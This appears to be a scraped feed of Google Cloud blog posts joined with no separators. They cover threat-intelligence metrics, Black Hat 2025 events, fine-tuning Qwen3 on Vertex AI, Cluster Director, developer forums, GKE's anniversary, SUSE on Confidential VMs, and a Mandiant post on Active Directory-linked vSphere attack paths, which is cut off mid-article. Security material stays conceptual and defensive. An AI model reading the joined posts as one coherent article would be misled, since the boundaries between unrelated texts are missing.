Alert fidelity: Are we seeing fewer false positives due to better-contextualized alerts from threat intelligence?
Blocked threats: How many threats were proactively blocked by systems fed with threat intelligence?
Hunting success: How many new threats were identified through intelligence-led hunting?
Regular reviews: Monthly or quarterly review of PIRs, threat intelligence sources, and the effectiveness of integrations can help keep your threat intelligence strategy current.
Incident-driven refinement: After every significant incident, conduct a lessons-learned session specifically on the contributions that threat intelligence made to the incident response.
How Google Threat Intelligence can help
Despite concerns about data overload, 80% of survey respondents said that threat intelligence providers should offer information sources that are both broad and deep. Security teams should feel confident that they have a holistic view of available intelligence.
Augmented by advanced AI, Google Threat Intelligence provides unparalleled visibility into threats, enabling us to deliver detailed and timely threat intelligence to security teams around the world. It combines Mandiant frontline expertise, the global reach of the VirusTotal community, and the breadth of visibility only Google can deliver.
Our Advanced Intelligence Access (AIA) and Essential Intelligence Access (EIA) programs provide organizations with access to embedded and targeted intelligence experts, as well as early access to threat data. Mandiant Academy offers training courses for security professionals, including many focused on how to best consume and apply threat intelligence to improve tactical defenses and overall security posture.
At Google Cloud Security, our mission is to empower organizations to strengthen their defenses with innovative security capabilities, all while simplifying and modernizing their cybersecurity. In a world of evolving threats and increasing complexity, we believe true security comes from clarity, not more noise.
We’re excited to bring this commitment to innovation and simplification to Black Hat USA 2025, where you can discover how Google Cloud Security and Mandiant can help you navigate the complex threat landscape, adopt agentic security, and make Google an extension of your security team.
From connecting with our security experts to witnessing innovative cloud security technology in action, we’re offering Black Hat attendees a packed schedule of booth activities, insightful sessions, and exclusive events.
Visit our booth and connect with experts
Booth #2240 is where you can meet the Google Cloud Security team. Discover our latest innovations and learn directly from Mandiant experts about the techniques and tactics from their most recent investigations. See firsthand how agentic security can help you detect and remove threats more effectively and make your security team more productive.
Experience our expanded demo landscape
Catch our on-demand product and service demos during Business Hall/Expo hours to learn how Google Cloud Security can protect your organization. Plus, connect with our security experts and partners to discuss your specific needs.
Google Threat Intelligence: Experience how you can get ahead of the latest threats with Google Threat Intelligence. Know who’s targeting you and focus on the most relevant threats to your organization.
Google Security Operations:Discover how our intelligence-driven and AI-powered security operations platform, Google Security Operations, combines Google’s hyper-scale infrastructure along with unparalleled visibility and understanding of cyber adversaries to enable security teams to uncover the latest cyber threats in near real-time.
AI for Defenders:Learn how AI agents in Google Cloud Security products can autonomously investigate threats, triage alerts and resolve misconfigurations. Join us as we demo how AI agents can automate manual and repetitive tasks to help you move from insight to action faster.
Cloud Security: Explore how Google Cloud provides built-in, secure controls to help you maintain a strong cloud security posture. See in action how Google Cloud’s Security Foundation recommended products help address most common cloud adoption use cases.
Mandiant Incident Response: Learn how Mandiant uses frontline experience with threat intelligence and incident response to help organizations like yours tackle top cloud security challenges.
Chrome Enterprise: Stop by to find out why Chrome is the most trusted enterprise browser, meeting the secure enterprise browsing needs of today’s workforce.
Join us at Google Cloud Security Hub
Beyond the main expo hall, make your way to the Google Cloud Security Hub, located conveniently in The Cove next to Libertine Social at Mandalay Bay. From the expo hall, head past the Starbucks, and our Customer Hub will be on your right. Here’s a detailed map for easy way-finding:
How to find Google Cloud at the conference.
The Hub is home to several exclusive events and spaces:
Enjoy the exclusive Customer Lounge
Looking for a place to recharge and connect in a more relaxed setting? If you schedule a meeting with our team, you’ll gain exclusive access to our Customer Lounge at the Google Hub. We’ll have snacks, beverages, and a comfortable space for you to take a break from the conference floor. Reach out to your sales representative to schedule your meeting and get on the guest list.
Unwind at the Google Cloud Security Happy Hour
Join us for the Google Cloud Security Happy Hour on Wednesday, Aug. 6, from 5:00 p.m. to 7:00 p.m., at the Google Hub for a relaxed evening of networking. It’s the perfect opportunity to unwind after a day of briefings and connect with our team and your peers.
Attend the Threat Briefing and dinner
Customers are invited to join us for an exclusive Threat Briefing and Dinner on Tuesday, Aug. 5, from 6:00 p.m. to 9:00 p.m., at the Google Hub. You’ll gain deep insights from Mandiant Intelligence, with a special briefing from Luke McNamara, chief deputy analyst.
Enhance your skills with Mandiant Academy training
Improve your expertise with hands-on training directly from Mandiant’s frontline cybersecurity experts. Mandiant Academy is offering the following courses during Black Hat (requires prior registration):
With your Briefing conference pass, you can attend these sessions where Google Cloud Security and Mandiant experts will share their insights:
Bridging the AI reality gap: Join Vijay Ganti (director, product management, Google Cloud Security) and Spencer Lichtenstein (group product manager, Google Security Operations) as they pull back the curtain on AI in security. In the session, they’ll dive deep into how Google is integrating AI into its security products. You’ll learn about the rigorous data science processes we use to measure every task of the end-to-end system, and why this meticulous approach is crucial for giving you an edge against threat actors. We’ll also share the latest, most impactful agent demos.
Participate in an OT Incident Response: Join Tim Gallo (head of global solution architects, Google Cloud Security) and Paul Shaver (global OT security lead, Google Cloud Security) for a unique, interactive session where you can experience what it’s truly like to navigate a critical operational technology (OT) incident. In this live session, you’ll step into the shoes of a Mandiant Incident Responder as we guide you through a simulated OT incident. You’ll see firsthand the crucial decision points, compare your choices with those of our experts, and gain invaluable insights into the complexities of real-world OT incident response.
Autonomous Timeline Analysis and Threat Hunting: An AI Agent for Timesketch: In this talk, we will present the first AI-powered agent capable of autonomously performing digital forensic analysis on the large and varied log volumes typically encountered in real–world incidents. We will demonstrate the agent’s proficiency in threat hunting and evaluate our technique on a dataset of 100 diverse, real-world compromised systems.
The Ransomware Response Playbook: Join this session where security experts will discuss how best to prepare for and handle a ransomware extortion attack against your business. This panel discussion will explore critical questions such as: Where is the malicious payload and how is it spreading? How do you interact and barter with your attacker (or not)? Who do you call? Are your backups protected?
At its core, FACADE is a novel self-supervised ML system that detects suspicious actions by analyzing the context of corporate logs, leveraging a unique contrastive learning strategy. This, combined with an innovative clustering approach, leads to unparalleled accuracy: a false positive rate under 0.01%, and as low as 0.0003% for single rogue actions. This session will not only present the underlying technology but also demonstrate how to use the recently released FACADE open-source version to protect your own organization.
Threat Space Workshop: Join Nadean Tanner for this hands-on experience with Harbinger, an AI-powered red teaming platform for streamlined operations and enhanced decision-making.
Learn about open-source solutions at Arsenal
Harbinger: An AI-Powered Red Teaming Platform for Streamlined Operations and Enhanced Decision-Making: Harbinger is an AI-powered platform that streamlines your workflow by integrating essential components, automating tasks, and providing intelligent insights. It consolidates data from various sources, automates playbook execution, and uses AI to suggest your next moves, making red teaming more efficient and effective. With Harbinger, you can focus on what matters most – achieving your objectives and maximizing the impact of your assessments.
Timesketch: AI-Powered Super Timeline Analysis: Timesketch is a leading, free open-source software (licensed under Apache-2.0) for collaborative forensic-timeline analysis, with more than 2.6k stars on GitHub. In this arsenal, we announce and showcase Timesketch AI extension designed to drastically speedup (human) analysts, identify compromise root cause analysis and improve incident reaction time.This demo will showcase AI-driven investigations in Timesketch, highlighting its ability to:
Autonomously analyze timelines, answer investigative questions, identify key events, and find the root cause of compromises.
Provide interactive review, empowering analysts to verify, edit, and refine AI-generated findings with clear links to supporting facts, emphasizing human validation.
Facilitate collaborative timeline analysis by integrating with Timesketch’s collaborative environment, enabling teamwork on AI-powered investigations.
Meet you there
Black Hat USA 2025 promises to be an impactful week, and Google Cloud Security is ready to share valuable knowledge and innovative solutions. We encourage you to make the most of your time by visiting our booth, attending our sessions, re-energizing at the Google Cloud Security Hub, and connecting with our team.
We’re eager to discuss your security challenges and demonstrate how Google can be your strategic security partner in the face of evolving threats.
Developers building with gen AI are increasingly drawn to open models for their power and flexibility. But customizing and deploying them can be a huge challenge. You’re often left wrestling with complex dependencies, managing infrastructure, and fighting for expensive GPU access.
Don’t let that complexity slow you down.
In this guide, we’ll walk you through the end-to-end lifecycle of taking an open model from discovery to a production-ready endpoint on Vertex AI. In this blog post, we will use fine-tuning and deploying Qwen3 as our example, showing you how to handle the heavy lifting so you can focus on innovation.
Part 1: Quickly choose the right base model
So you’ve decided to use an open model for your project: which model, on what hardware, and which serving framework? The open model universe is vast, and the “old way” of finding the right model is time consuming. You could spend days setting up environments, downloading weights, and wrestling with requirements.txt files just to run a single test.
This is a common place for projects to stall. But with Vertex AI, your journey starts in a much better place: the Vertex AI Model Garden, a curated hub that simplifies the discovery, fine-tuning and deployment of cutting-edge open models. With over 200+ validated options (and growing!) including popular choices like Gemma, Qwen, DeepSeek, and Llama. Comprehensive model cards offer crucial information, including details on recommended hardware (such as GPU types and sizes) for optimal performance. Additionally, Vertex AI has default quotas for dedicated on-demand capacity of the latest Google Cloud accelerators to make it easier to get started.
Qwen 3 Model card on Vertex AI Model Garden
Importantly, Vertex AI conducts security scans on these models and their containers, which gives you an added layer of trust and mitigating potential vulnerabilities from the outset. Once you found a model, like Qwen3, for your use case, Model Garden provides one-click deployment options or pre-configured notebooks (code) making it easy to deploy the model as an endpoint using Vertex AI inference Service, ready to be integrated into your application.
Qwen3 Deployment options from Model Garden
Additionally, Model Garden provides optimized serving containers—often leveraging vLLM or SGLang, or Hex-LLM for high-throughput inference — specifically designed for performant model serving. Once your model is deployed (via an experimental endpoint or notebook) you can start experimenting and establishing a baseline for your use case. This baseline lets us benchmark our fine-tuned model later on.
Model Inference framework options
Qwen3 quick deployment on Endpoint
It’s important that you incorporate evaluation early on in the process. You can leverage Vertex AI’s Gen AI evaluation service to assess the model against your own data and criteria, or integrate open-source frameworks. This essential early validation ensures you confidently select the right base model.
By the end of this experimentation and research phase, you’ll have efficiently navigated from model discovery to initial evaluation ready for the next step.
Part 2: Start parameter efficient fine-tuning (PEFT) with your data
You’ve found your based model – in this case Qwen3. Now for the magic: making it yours by fine-tuning it on your specific data. This is where you can give the model a unique personality, teach it a specialized skill, or adapt it to your domain.
Step 1: Get your data ready First you need to get your data ready. Reading data can often be a bottleneck, but Vertex AI makes it simple. You can seamlessly pull your datasets directly from Google Cloud Storage (GCS) and BigQuery (BQ). For more complex data-cleaning and preparation tasks, you can build an automated Vertex AI Pipeline to orchestrate the preprocessing work for you.
Step 2: Hands-on tuning in the notebook Now you can start fine-tuning your Qwen3 model. For Qwen3, the Model Garden provides a pre-configured notebook that uses Axolotl, a popular framework for fine-tuning. This notebook already includes optimized settings for techniques like:
QLoRA: A highly memory-efficient tuning method, perfect for running experiments without needing massive GPUs.
FSDP (Fully shared data parallelism): A technique for distributing a large model across multiple GPUs for larger scale training.
You can run the Qwen3 fine-tuning process directly inside the notebook. This is the perfect “lab environment” for quick experiments to discover the right configuration for the fine-tuning job.
Step 3: Scaling up with Vertex AI training Experimenting and getting started in a notebook is great, but you might need more GPU resources and flexibility for customization. This is when you graduate from the notebook to a formal Vertex AI Training job.
Instead of being limited by a single notebook instance, you submit your training configuration (using the same container) to Vertex AI’s managed training service offering more scalability, flexibility and control. Here’s what that gives you:
On-demand accelerators: Access an on-demand pool of the latest accelerators (like H100s) when you need them or choose DWS Flex start, spot GPUs, BYO-reservation options for more flexibility or stability.
Managed infrastructure: No need to provision or manage servers or containers. Vertex AI handles it all. You just define your job, and it runs.
Reproducibility: Your training job is a repeatable artifact, making it easier to be used in a MLOps workflow.
Once your job is running, you can monitor its progress in real-time with TensorBoard to watch your model’s loss and accuracy improve. You can also check in on your tuning pipeline.
Beyond using the Vertex AI Training Job you can go with Ray on Vertex or DIY on GKE or GCE based on flexibility and control needed.
Part 3: Evaluate your fine-tuned model
After fine-tuning your Qwen3 model on Vertex AI, robust evaluation is crucial to assess its readiness. You compare the evaluation results to your baseline created during experimentation.
For complex generative AI tasks, Vertex AI’s Gen AI Evaluation Service uses a ‘judge’ model to assess nuanced qualities (coherence, relevance, groundedness) and task-specific criteria, supporting side-by-side (SxS) human reviews. Using the GenAI SDK, you can programmatically evaluate and compare your models. This service provides deep, actionable insights into model performance—going far beyond simple metrics like perplexity by also incorporating automated side-by-side comparisons and human review.
In the evaluation notebook, We evaluated our fine-tuned Qwen3 model against the base model using the GenAI Evaluation Service. For each query, we provided responses from both models and used the pairwise_summarization_quality metric to let the judge model determine which performed better.
For evaluation on other popular models, refer to this notebook
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud AI and ML’), (‘body’, <wagtail.rich_text.RichText object at 0x3e2770f9b4c0>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/vertex-ai/’), (‘image’, None)])]>
Part 4: Deploy to a production endpoint
Your model has been fine-tuned and validated. It’s time for the final, most rewarding step: deploying it as an endpoint. This is where many projects hit a wall of complexity. With Vertex AI inference it’s a streamlined process. When you deploy to a Vertex AI Endpoint, you’re not just getting a server; you’re getting a fully managed, production-grade serving stack optimized for two key things:
1. Fast performance
Optimized serving: Your model is served using a container built with cutting-edge frameworks like vLLM, ensuring high throughput and low latency.
Rapid start-up: Techniques like fast VM startup, container image streaming, model weight streaming, and prefix caching mean your model can start up quickly.
2. Cost-effective and flexible scaling
You have full control over your GPU budget. You can:
Use on-demand GPUs for standard workloads.
Apply existing Committed Use Discounts (CUDs) and reservations to lower your costs.
Use Dynamic Workload Scheduler (DWS) Flex Start to acquire capacity for up to 7 days at a discount.
Leverage Spot VMs for fault-tolerant workloads to get access to compute at a steep discount.
In short, Vertex AI Inference handles the scaling, the infrastructure, and the performance optimization. You just focus on your application.
Get started
Successfully navigating the lifecycle of an open model like Qwen on Vertex AI, from initial idea to production-ready endpoint, is a significant achievement. You’ve seen how the platform provides robust support for experimentation, fine-tuning, evaluation, and deployment.
Want to explore your own open model workload? The Vertex AI Model Garden is a great place to start.
In April, we released Cluster Director, a unified management plane that makes deploying and managing large-scale AI infrastructure simpler and more intuitive than ever before, putting the power of an AI supercomputer at your fingertips. Today, we’re excited to release new features in preview including an intuitive interface, managed Slurm experience, and observability dashboard that intercepts performance anomalies.
From complex configuration to easy creation
AI infrastructure users can spend weeks wrestling with complex configurations for compute, networking, and storage. Because distributed training workloads are highly synchronized jobs across thousands of nodes and are highly sensitive to network latency, performance bottlenecks can be difficult to diagnose and resolve. Cluster Director solves these challenges with a single, unified interface that automates the complex setup of AI and HPC clusters, integrating Google Cloud’s optimized compute, networking, and storage into a cohesive, performant, and easily managed environment.
LG Research uses Google Cloud to train their large language models, most recently Exaone 3.5. They have significantly reduced the time it takes to have a cluster running with their code — from over a week to less than one day. That’s hundreds of GPU hours saved for real workloads.
“Thanks to Cluster Director, we’re able to deploy and operate large-scale, high-performance GPU clusters flexibly and efficiently, even with minimal human resources.” – Jiyeon Jung, AI Infra Sr Engineer, LG AI Research
Biomatter uses Google Cloud to scale their in silico design processes. Cluster Director has made the cluster deployment and management smooth, enabling them to dedicate more focus to the scientific challenges at the core of their work.
“Cluster Director on Google Cloud has significantly simplified the way we create, configure, and manage Slurm-based AI and HPC clusters. With an intuitive UI and easy access to GPU-accelerated instances, we’ve reduced the time and effort spent on infrastructure.” – Irmantas Rokaitis, Chief Technology Officer, Biomatter
Read on for what’s new in the latest version of Cluster Director.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud infrastructure’), (‘body’, <wagtail.rich_text.RichText object at 0x3e03bd28f970>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/compute’), (‘image’, None)])]>
Simplified cluster management across compute, network, and storage
Use a new intuitive view in the Google Cloud console to easily create, update, and delete clusters. Instead of a blank slate, you start with a choice of validated, optimized reference architectures. You can add one or more machine configurations from a range of VM families (including A3 and A4 GPUs) and specify the machine type, the number of GPUs, and the number of instances. You can choose your consumption model, selecting on-demand capacity (where supported), DWS Calendar or Flex start modes, Spot VMs for cost savings, or attaching a specific reservation for capacity assurance.
Cluster Director also simplifies networking by allowing you to deploy the cluster on a new, purpose-built VPC network or an existing one. If you create a new network, the firewall rules required for internal communication and SSH access are configured automatically, removing a common pain point. For storage, you can create and attach a new Filestore or Google Cloud Managed Lustre instance, or connect to an existing Cloud Storage bucket. These integrations help ensure that your high-performance file system is correctly mounted and available to all nodes in the cluster from the moment they launch.
Powerful job scheduling with Managed Slurm
Cluster Director provides fault-tolerant and highly scalable job scheduling out of the box with a managed, pre-configured Slurm environment. The controller node is managed for you, and you can easily configure the login nodes, including machine type, source image, and boot-disk size. Partitions and nodesets are pre-configured based on your compute selections, but you retain the flexibility to customize them, now or in the future.
Topology-aware placement
To maximize performance, Cluster Director is deeply integrated with Google’s network topology. This begins when clusters are created, when VMs are placed in close physical proximity. Crucially, this intelligence is also built directly into the managed Slurm environment. The Slurm scheduler is natively topology-aware, meaning it understands the underlying physical network and automatically co-locates your job’s tasks on nodes with the lowest-latency paths between them. This integration of initial placement and ongoing job scheduling is a key performance enhancer, dramatically reducing network contention during large, distributed training jobs.
Comprehensive visibility and insights
Cluster Director’s integrated observability dashboard provides a clear view of your cluster’s health, utilization, and performance, so you can quickly understand your system’s behavior and diagnose issues in a single place. The dashboard is designed to easily scale to tens of thousands of VMs.
Advanced diagnostics to detect performance anomalies
In distributed ML training, stragglers refer to small numbers of faulty or slow nodes that eventually slow down the entire workload. Cluster Director makes it easy to quickly find and replace stragglers to avoid performance degradation and wasted spend.
Try out Cluster Director today!
We are excited to invite you to be among the first to experience Cluster Director. To learn more and express your interest in joining the preview, talk to your Google Cloud account team or sign up here. We can’t wait to see what you will build.
Building applications is sometimes messy, it’s always iterative, and it often works best when it’s collaborative. As a developer, you regularly experience the frustration of a cryptic error message and the quiet triumph of finding a clever workaround. Either way, finding help or sharing success is best facilitated by a community of builders.
That’s why we are excited to launch the Google Developer Program forums at at discuss.google.dev. The new forums are designed to help people build with Google technology. You will find discussion groups to engage with other developers and Google experts; how-to articles, reference architectures and use cases; and a community of users looking to help.
We’re also migrating the existing Google Cloud, Workspace Developer, AppSheet, and Looker communities, channels and content from googlecloudcommunity.com over to discuss.google.dev. So, existing knowledge isn’t lost – it’s just moving to a new home. And by migrating the community we’re able to focus on two core principles in the new design: high trust and high utility.
Signal over noise
Your Google Developer Program profile is how you will access the forums. By unifying our sign-in, and connecting forum profiles directly to Google Developer Program profiles, we can programmatically display your earned credentials and reputation which you’ve earned through learning, events, and meetups that happen across the Google ecosystem.
aside_block
<ListValue: [StructValue([(‘title’, ‘Not a Google Developer Program member yet?’), (‘body’, <wagtail.rich_text.RichText object at 0x3e03bd2a8580>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>
We’re starting with the Google Developer Expert flair icon next to a user’s name and we plan to extend this to other programs in the near future. Additionally, if you are part of a private product beta or Early Access Program (EAP), your forum account is automatically granted access to the corresponding private discussion groups. No more filling out forms or waiting for permissions. Your Developer Program profile is your passport.
Why we chose Discourse for our new forums
While we were tempted to build a custom solution from scratch we chose Discourse for a few key reasons:
Built by and for developers: Discourse is an open-source platform that prioritizes function over flash with markdown, code formatting, keyboard navigation, and structured conversations.
Extensibility: Its robust API and plugin architecture allow us to integrate our own Google technologies—like Gemini-powered spam filtering and the Google Developer Program—without reinventing the wheel.
This is your invitation!
This new community is a space for all of us. Come say hello! Ask a question, or answer one. Share what you’re working on, or get help with what you’re stuck on. This is where the real work happens, and we want to be a part of it with you.
In the coming months, you’ll see more of our engineers, product managers, and developer advocates join the conversation to not only help answer questions, but also ask them, share their own ideas, and engage with the same passion as you do. They won’t always have a perfect solution to a tricky question, but they’re committed to listen, engage, and work with the community to find the best path forward.
How to Get Started
Explore Now: Visit https://discuss.google.dev. Browse the categories, read ongoing discussions, and find your community.
Join the Conversation: If you’re a Google Developer Program member, sign in and dive in! Ask those tough questions, share your solutions, and contribute your expertise. Not a member yet? Visit developers.google.com/program to learn more and join at no-cost.
For googlecloudcommunity.com users: We’re working to make the transition as smooth as possible. You’ll find familiar topics and a wealth of historical discussions here. We encourage you to explore and continue your conversations on this new, unified platform.
The evolution of the cloud has been tremendous over the past decade. Every step of the way, Google Kubernetes Engine (GKE) has been there to meet new challenges. From giving DevOps more scalable foundations to supporting the rise of cloud-native AI, we took Kubernetes’ brilliance and gave it the fully managed service it deserved to thrive.
GKE turns 10 this year, and to celebrate, we’ve launched 10 years of GKE, an ebook that explores this incredible decade and how customers have built global businesses powered on this managed platform. We released Kubernetes as open source in 2014, and one million contributions later, we couldn’t be prouder of what Kubernetes has become, its history, and its future with GKE.
GKE’s leading lights
One of the earliest GKE customers was Signify, a global leader in lighting for professionals and the company behind Philips Hue. Ten years on, it continues to thrive on the service. Growing from 200 million to 3.5 billion daily transactions, Signify scaled from one GKE cluster to seven, and is looking to leverage GKE for new workloads, including platform engineering and AI for multi-cluster supervision.
“The constant improvements made by GKE over the past 10 years profoundly changed the way we design, deploy, and evolve our services,” says Leon Bouwmeester, Director of Engineering and Head of Hue Platform at Signify. “We spend less time on infrastructure management and can focus our efforts on what really matters: the quality of the user experience and the speed of innovation.”
However, what put GKE on the map was Pokémon GO, Niantic’s ground-breaking geolocation game. As millions took to the streets to catch ‘em all, GKE brought to life and kept up with its explosive launch. “Never have I taken part in anything close to the growth that Google Cloud customer Niantic experienced with the launch of Pokémon GO,” says Luke Stone, director of customer reliability engineering at Google Cloud.
Target vs. worst case vs. actual traffic to GKE during Niantic’s launch of Pokémon Go.
AI for tomorrow on GKE today
Today, GKE supports brand new businesses in the rapidly evolving world of AI. Customers report how their AI initiatives are made more powerful on GKE, helping them manage the complex demands of their deployments. This means flexibility and scale for AI workloads and cost-efficient inference — so you can focus on training, not managing.
With GKE Autopilot, AI can also help you optimize your configurations and workloads. In the ebook, learn more about how GKE Autopilot mode frees up teams to focus on innovation, with businesses sharing how they automatically improved performance and cost savings — with the stability and security they expect from Google Cloud.
Join the celebration by exploring 10 years of GKE for yourself. We‘ve distilled a decade of insights into what makes GKE so effective, thoughts from customers on how GKE is supporting their work at scale, and why we’re ready for everything AI has in store for the decade ahead. It’s been an amazing ride, and with AI reshaping the future of application development, we’re just getting started.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud containers and Kubernetes’), (‘body’, <wagtail.rich_text.RichText object at 0x3e1ececfbf40>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectpath=/marketplace/product/google/container.googleapis.com’), (‘image’, None)])]>
Securing sensitive data is a crucial part of moving workloads to the cloud. While encrypting data at rest and in transit are standard security practices, safeguarding data in use — while it’s actively being processed in memory — can present unique security and privacy challenges.
To make sure that data in use is also protected, we developed Confidential Computing with our hardware partners to use hardware-based Trusted Execution Environments (TEEs) to isolate and safeguard data in use, even from the cloud provider hosting the data.
To help build a secure and reliable cloud environment, we’ve partnered with SUSE, a global leader in open source and secure enterprise solutions. Together, we’ve developed targeted solutions that can enable organizations to run their sensitive workloads in the cloud, combining the hardware-based security of Google Cloud Confidential Virtual Machines (Confidential VMs) with the security of SUSE Linux Enterprise Server (SLES).
Today, we are excited to announce that SUSE Linux Enterprise Server now supports Google Cloud Confidential VMs that have Confidential Computing technologies AMD SEV, AMD SEV-SNP, or Intel TDX enabled. Previously, SLES was only generally available on AMD SEV and AMD SEV-SNP-based Confidential VMs, but now SLES is also generally available on Intel TDX-based Confidential VMs which run on the performant C3 machine series. This new offering provides customers more choice and flexibility in securing sensitive workloads, while expanding Confidential VM support for guest operating system images.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud security products’), (‘body’, <wagtail.rich_text.RichText object at 0x3e1ececa2790>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
At Google Cloud, we strongly advocate for a layered approach to security. Here, SUSE Linux Enterprise Server (SLES) strengthens the guest OS layer, while Confidential VMs strengthen the infrastructure layer. Additionally, the comprehensive SLES security portfolio can help support compliance, risk mitigation, and cybersecurity best practices:
Meeting compliance requirements: SLES is designed to help organizations meet regulatory requirements through its security features. SLES comes with Federal Information Processing Standards (FIPS) 140-3 certified cryptographic modules.
Reducing evaluation effort: Utilizing SLES with supplier certifications can help customers streamline their evaluation processes by referencing existing certifications.
Hardening automatically: SLES includes an automated hardening process that can help with Security Technical Implementation Guide (STIG)-compliant hardening during setup with YAST or AutoYAST, which can be adjusted as needed.
The combination of SLES within Google Cloud Confidential VMs can offer several benefits:
Complementing encryption with a secure OS: With its security focus and certifications, SLES can provide a hardened operating system in a trusted environment, making both applications and the OS less susceptible to vulnerabilities.
Supporting integrity and trustworthiness: Customers can have greater confidence that both the hardware and the operating system are working as expected. Confidential VMs offer remote attestation, allowing verification of the VM identity and state. Running a secure OS, such as SLES, on an attested Confidential VM can support overall data and code integrity.
Supporting Confidential Computing technologies: By providing a consistent and secure operating system across all Google Cloud Confidential Computing types (AMD SEV, AMD SEV-SNP, and Intel TDX), SLES can help simplify the deployment and management of sensitive cloud workloads.
Enhancing compliance in sensitive environments: For workloads that require a notable level of data protection due to compliance regulations, this joint security solution of SLES on Confidential VMs can help alleviate cloud migration concerns from internal auditors.
Addressing internal and external threats: While Confidential Computing primarily can help protect against external threats like hypervisors, running a security-focused OS like SLES in a Confidential VM can offer an additional layer of protection against potential internal vulnerabilities in the guest OS itself.
Reinforcing data ownership and control: Confidential Computing can help provide technical assurances that you have retained control and effective ownership of your data, even when your data is processed in the cloud. By encrypting data in use and limiting access to only your authorized workloads within a TEE, you can gain stronger assurances for your digital sovereignty.
Extending Zero Trust to execution: By encrypting data in memory on the CPU, this solution extends the Zero Trust principle of “never trust, always verify” to data even when it’s actively being processed. This ensures data remains secure and encrypted throughout its lifecycle, including during execution, helping to enforce a real Zero Trust environment.
Establishing a secure foundation for cloud-native workloads: With SLES providing a secure base and Google Cloud Confidential VMs offering hardware-level protection, this environment together with SUSE Cloud Native solutions can deliver a robust foundation for your most sensitive cloud-native applications. By securing the underlying compute resources, you can extend data-in-use protection to higher level containerized and cloud-native workloads.
Organizations can confidently move regulated and confidential applications to Google Cloud, knowing their data is supported throughout its lifecycle, including while in use and with a secure guest OS, to bolster their digital sovereignty.
Broadcom’s VMware vSphere product remains a popular choice for private cloud virtualization, underpinning critical infrastructure. Far from fading, organizations continue to rely heavily on vSphere for stability and control. We’re also seeing a distinct trend where critical workloads are being repatriated from public cloud services to these on-premises vSphere environments, influenced by strategies like bimodal IT and demands for more operational oversight.
The common practice of directly integrating vSphere with Microsoft Active Directory (AD), while simplifying administration tasks, creates an attack path frequently underestimated due to a misunderstanding of the inherent risks presented today. This configuration extends the AD attack surface directly to the hypervisor. From a threat actor’s perspective, this integration constitutes a high-value opportunity. It transforms the relatively common task of compromising AD credentials into a potential high value scenario, granting access to the underlying infrastructure hosting the servers and in turn allowing them to gain privileged administrative control over ESXi hosts and vCenter and ultimately seize complete command of the virtualized infrastructure.
Ransomware aimed at vSphere infrastructure, including both ESXi hosts and vCenter Server, poses a uniquely severe risk due to its capacity for immediate and widespread infrastructure paralysis. With the end of general support for vSphere 7.x approaching in October 2025—the version Mandiant has observed to be running by a large majority of organizations—the threat of targeted ransomware has become urgent. As recovering from such an attack requires substantial time and resources, proactive defense is paramount. It is therefore critical for organizations to understand the specific threats against these core components and implement effective, unified countermeasures to prevent their compromise, especially before support deadlines introduce additional risk.
This blog post will logically break down the inherent risks and misunderstandings with integrating vSphere with Microsoft AD. Using Mandiant’s deep experience of both vSphere ransomware incidents and proactive assessments of both AD and vSphere, we will provide a directive for understanding risk and increasing security posture aligned with today’s threats in respect of enterprise vSphere management.
To understand the security risks in a vSphere environment, it’s essential to understand its architecture. A compromise at one layer can have cascading effects throughout the entire virtualized environment.
At its core, vSphere is a platform that pools physical datacenter resources like compute, storage, and networking into a flexible layer of virtual infrastructure, a task primarily accomplished by two key components, ESXi and vCenter, as shown in the following diagram:
ESXi (The Hypervisor): This is the foundational layer of vSphere. ESXi is a bare metal hypervisor, meaning it installs directly onto the physical server hardware without requiring an underlying operating system. Its core job is to partition that server into multiple, isolated virtual machines (VMs). Each VM, which is essentially just a collection of files, runs its own operating system and applications, acting like an independent computer. The hypervisor’s minimal design is intentional, aiming to reduce its own attack surface while efficiently managing the server’s resources.
vCenter (The Control Plane): If ESXi hosts are the workers, the vCenter Server is the “brain” or control plane for the entire environment. It provides a single web-based interface to manage all connected ESXi hosts and the VMs they run. ESXi hosts are registered with vCenter, which uses agents on each host to manage operations and enable advanced features like automatic workload balancing and high availability for failover protection.
Integrating vSphere with AD creates a flexible environment that simplifies identity management, yet it introduces profound security risks. This direct link can turn an AD compromise into a significant threat against the entire vSphere deployment.
An Outdated Blueprint: Re-examining Foundational vSphere Security
Virtualization has been a cornerstone of enterprise IT for nearly two decades, solving server sprawl and delivering transformative operational agility. Alongside it, AD remains a pillar of enterprise IT. This has led to a long-standing directive that all enterprise technology, including critical infrastructure like vSphere, must integrate with AD for centralized authentication. The result is a risky dependency—the security of foundational infrastructure is now directly tied to the security of AD, meaning any compromise within AD becomes a direct threat to the entire virtualization environment.
In the past, vSphere security was often approached in distinct, siloed layers. Perimeter security was stringent, and threats were typically viewed as internal, such as configuration errors, rather than from external threat actors. This, combined with the newfound ease of image-based backups, often led to security efforts becoming primarily focused on robust business continuity and disaster recovery capabilities over proactive defense. As environments expanded, managing local user accounts created significant administrative overhead, so support for AD integration was introduced for centralized identity management.
Mandiant’s observation, based on extensive incident response engagements, is that many vSphere environments today still operate on this foundational architecture, carrying forward security assumptions that haven’t kept pace with the evolving threat landscape. As Mandiant’s assessments frequently identify, these architectures often prioritize functionality and stability over a security design grounded in today’s threats.
So what’s changed? Reliance solely on perimeter defenses is an outdated security strategy. The modern security boundary focuses on the user and device, typically protected by agent-based EDR solutions. But here lies the critical gap: The ESXi hypervisor, a purpose-built appliance, which, contrary to what many people believe, is not a standard Linux distribution. This specialized architecture inherently prevents the installation of external software, including security tools like EDR agents. vSphere documentation explicitly addresses this, stating:
“The ESXi hypervisor is a specialized, purpose-built solution, similar to a network router’s firmware. While this approach has several advantages, it also makes ESXi unable to run “off-the-shelf” software, including security tools, designed for general-purpose operating systems as the ESXi runtime environment is dissimilar to other operating systems.
The use of Endpoint Detection and Response (EDR) and other security practices inside third-party guest operating systems is supported and recommended.”
